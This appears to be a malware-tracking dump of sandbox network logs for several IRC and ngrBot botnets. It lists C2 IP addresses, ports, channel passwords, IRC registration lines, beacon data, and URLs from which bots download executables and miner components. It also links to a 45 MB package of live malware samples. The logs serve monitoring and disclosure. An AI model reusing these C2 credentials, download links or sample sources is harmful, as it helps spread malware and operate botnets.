g0ds.no-ip.biz DNS_TYPE_A 71.210.115.55
71.210.115.55:3086
Data sent:
2a5c 534e 4557 2a2f 327c 7c2a 7c7c 4d51  *\SNEW*/2||*||MQ
3d3d 7c7c 2a7c 7c51 5651 3d7c 7c2a 7c7c  ==||*||QVQ=||*||
4e43 3479 7c7c 2a7c 7c57 4641 6765 4467  NC4y||*||WFAgeDg
327c 7c2a 7c7c 5157 5274 6157 3570 6333  2||*||QWRtaW5pc3
5279 5958 5276 6367 3d3d 7c7c 2a7c 7c51  RyYXRvcg==||*||Q
5656 5553 4578 5051                      VVUSExPQ
212.7.214.59 (HTTP malware hosted in Netherlands, Dediserv Dedicated Servers Sp. Z O.o)
This malware takes its commands from a web interface at http://212.7.214.59/web/getcommand.php; the directory listing at http://212.7.214.59/web/ is open and lists the files.
The data identified by the following URLs was then requested from the remote web server:
http://212.7.214.59/web/getcommand.php?getcmd=1
http://212.7.214.59/web/report.php?p=26319&n=1
exe file: http://adf.ly/38d3H
69.65.19.116 (IRC botnet hosted in United States, Gigenet)
Remote Host      Port Number
69.65.19.116     8888
NICK dsvjrs
USER bwwfp "" "lol" :bwwfp
hosting infos: http://whois.domaintools.com/69.65.19.116
212.7.214.129 (ngrBot hosted in Netherlands, Dediserv Dedicated Servers Sp. Z O.o)
Remote Host      Port Number
199.15.234.7     80
83.233.33.6      80
212.7.214.129    1866
PASS ngrBot
PRIVMSG #!hot! :[DNS]: Blocked 1310 domain(s) - Redirected 0 domain(s)
NICK n{US|XPa}qtivayn
USER qtivayn 0 0 :qtivayn
JOIN #!hot! ngrBot
PRIVMSG #!hot! :[HTTP]: Updated HTTP spread interval to "3"
PRIVMSG #!hot! :[MSN]: Updated MSN spread interval to "2"
PRIVMSG #!hot! :[HTTP]: Updated HTTP
219.67.121.174 (IRC botnet hosted in Japan, Tokyo, Open Data Network (Japan Telecom Co. Ltd.))
Remote Host      Port Number
174.121.14.164   80
174.123.175.227  80
174.36.56.185    80
195.210.28.38    80
195.250.147.177  80
209.17.73.32     80
209.17.74.144    80
216.137.43.176   80
216.137.43.215   80
216.137.43.83    80
219.67.121.174   4244
PASS google_cache2.tmp
NICK new[iRooT-XP-USA]175415
USER 8307 "" "TsGh" :8307
PRIVMSG #!N!# :http://marijana1x2.bloger.hr Has Been Visited!
JOIN #!N!# WTF
PRIVMSG #!N!# :http://kajmak1.bloger.hr Has Been Visited!
exe file: http://iphone-start.org/FaceSexy.exe
hosting infos:
batebate.info (50k ngrBot hosted in United States, Herndon, Road Runner Holdco Llc)
Domains used to control bots:
bonusrata.info     67.228.81.181
serverdns091.info  64.31.42.106
batebate.info      74.62.155.1

Remote Host      Port Number
199.15.234.7     80
74.62.152.164    6969    PASS s3cr3t
68.178.232.100   6161    PASS s3cr3t

Remote Host      Port Number
199.15.234.7     80
94.231.108.37    80
74.62.155.136    6969    PASS ngrBot
67.228.81.181    6969    PASS ngrBot
64.31.42.106     6969    PASS ngrBot
NICK n{US|XPa}wpypkul
USER wpypkul 0 0 :wpypkul
JOIN #nava s3cr3t
201.218.0.157 (IRC botnet hosted in Ecuador, Quito, Telconet S.a)
Remote Host      Port Number
174.121.14.164   80
174.36.4.145     80
195.210.28.38    80
195.250.147.177  80
209.17.74.144    80
64.37.52.189     80
66.115.184.87    80
69.46.36.6       80
74.120.148.2     80
83.139.126.203   80
201.218.0.157    4244
PASS google_cache2.tmp
NICK new[iRooT-XP-USA]606170
USER 4514 "" "TsGh" :4514
JOIN #!N!# WTF
PRIVMSG #!N!# :http://kajmak1.bloger.hr Has Been Visited!
hosting infos: http://whois.domaintools.com/201.218.0.157
216.172.132.132 (ngrBot hosted in United States, San Jose, Serveryou.com - Oow)
Remote Host      Port Number
199.101.133.30   80
199.15.234.7     80
70.38.98.238     80
216.172.132.132  1888
PASS ngrBot
* The data identified by the following URLs was then requested from the remote web server:
  o http://dc360.4shared.com/download/A9fXfDif/gdfsdsfd534.exe
  o http://api.wipmania.com/
  o http://img104.herosh.com/2011/10/05/270463603.gif
PRIVMSG #XP :[d="http://dc360.4shared.com/download/A9fXfDif/gdfsdsfd534.exe" s="167936 bytes"] Updated bot file "C:\Documents and Settings\UserName\Application Data\Ldxaxl.exe" - Download retries: 0
PRIVMSG #XP :[d="http://img104.herosh.com/2011/10/05/270463603.gif"
45 MB malware samples
This package contains around 45 MB of malware samples (banking trojans, IRC bots, rootkits, etc.). Download: http://adf.ly/33Qdi
50.58.99.143 (IRC botnet hosted in United States, Columbus, Tw Telecom Holdings Inc)
Remote Host      Port Number
46.17.97.83      80
46.17.97.85      80
50.58.99.143     3301
* The data identified by the following URLs was then requested from the remote web server:
  o http://46.17.97.83/miner/mscoree.dll
  o http://46.17.97.83/miner/openldap.dll
  o http://46.17.97.83/miner/phoenix.exe
  o http://46.17.97.85/miner/filelist.txt
  o http://46.17.97.85/miner/license.txt
  o http://46.17.97.85/miner/curllib.dll
  o http://46.17.97.85/miner/gpl-2.0.txt
  o http://46.17.97.85/miner/hstart.exe
  o http://46.17.97.85/miner/libeay32.dll
  o http://46.17.97.85/miner/libsasl.dll
NICK [USA-XP-x86]14651
USER unreal 8 * :unreal
JOIN #boats